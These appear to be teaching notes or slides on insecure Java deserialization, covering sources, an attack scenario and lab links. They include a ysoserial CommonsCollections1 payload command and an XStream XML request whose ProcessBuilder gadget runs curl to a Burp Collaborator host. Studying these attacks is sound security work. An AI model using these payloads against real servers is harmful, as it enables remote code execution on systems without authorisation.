The bane of Java applications
root@kali# java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
Possible sources:
- Java object deserialization or similar libraries that allow dynamic objects
- XML protocols or other means of data transfer that allow dynamic data
Simplest examples:
data -> deserializer
data -> formatted string -> deserializer
weak tokens -> signature forgery -> deserialization
Not only rO0*
- XML, as in Apache Struts 2 RCE
- in general, any dynamic object builders
- dynamically loaded files, combined with a write vulnerability
- in general, any dynamic code execution
* Insecure Deserialization. “rO0”
A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing the user state and passing it back and forth with each request. An attacker notices the “rO0” Java object signature (in base64) and uses the Java Serial Killer tool to gain remote code execution on the application server.
Simple deserialization exploitation demo
lab: https://github.com/vulhub/vulhub/tree/master/mojarra/jsf-viewstate-deserialization
gadget structure https://gist.github.com/frohoff/24af7913611f8406eaf3
XML deserialization
request example:
POST /api/contacts HTTP/1.1
Host: localhost
Content-Type: application/xml
Accept: application/xml
<dynamic-proxy>
<interface>org.insecurelabs.api.contacts.Contact</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command><string>/usr/bin/curl</string><string>http://[yourid].burpcollaborator.net</string></command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
More at http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
